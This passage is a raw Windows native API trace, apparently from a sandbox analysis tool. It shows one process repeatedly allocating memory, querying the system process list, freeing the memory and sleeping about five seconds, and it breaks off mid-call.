NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0149.325] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0149.327] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0149.328] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0149.350] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0149.351] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0149.353] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0149.353] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0149.353] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0149.356] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0149.356] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0149.371] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0149.372] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0149.377] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0149.377] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0149.378] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0149.380] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0149.380] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0149.386] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0149.386] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0149.387] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0149.387] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0149.387] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0149.389] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0149.390] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0149.402] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0149.402] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0149.403] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0149.403] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0149.403] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0149.405] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0149.405] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0149.418] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0149.418] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0149.419] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0149.419] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0149.420] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0149.422] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0149.422] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0149.433] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0149.433] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0149.434] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0149.434] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0149.434] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0149.436] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0149.437] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0149.448] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0149.449] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0149.449] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0149.450] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0149.450] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0149.452] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0149.452] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0149.464] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0149.464] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0149.465] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0149.465] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0149.465] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0149.468] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0149.468] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0149.480] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0149.480] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0149.481] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0149.481] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0149.481] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0149.484] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0149.484] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0149.495] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0149.495] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0149.496] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0149.496] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0149.497] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0149.498] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0149.499] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0149.511] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0149.511] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0149.512] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0149.512] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0149.512] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0149.514] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0149.514] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0149.527] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0149.527] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0149.528] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0149.528] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0149.528] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0149.530] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0149.530] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0149.542] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0149.542] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0149.543] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0149.543] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0149.543] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0149.545] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0149.546] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0149.558] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0149.558] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0149.560] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0149.560] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0149.560] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0149.563] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0149.563] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0149.573] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0149.573] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0149.574] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0149.574] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0149.575] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0149.577] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0149.577] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0149.589] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0149.589] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0149.590] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0149.590] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0149.590] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0149.593] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0149.593] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0149.606] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0149.606] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0149.607] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0149.607] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0149.607] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0149.609] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0149.610] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0149.622] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0149.622] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0149.623] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0149.623] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0149.623] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0149.626] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0149.626] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0149.636] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0149.636] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0149.637] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0149.637] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0149.637] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0149.639] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0149.639] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0149.651] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0149.652] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0149.653] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0149.654] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0149.654] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0149.657] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0149.657] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0149.667] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0149.667] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0149.668] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0149.668] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0149.669] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, 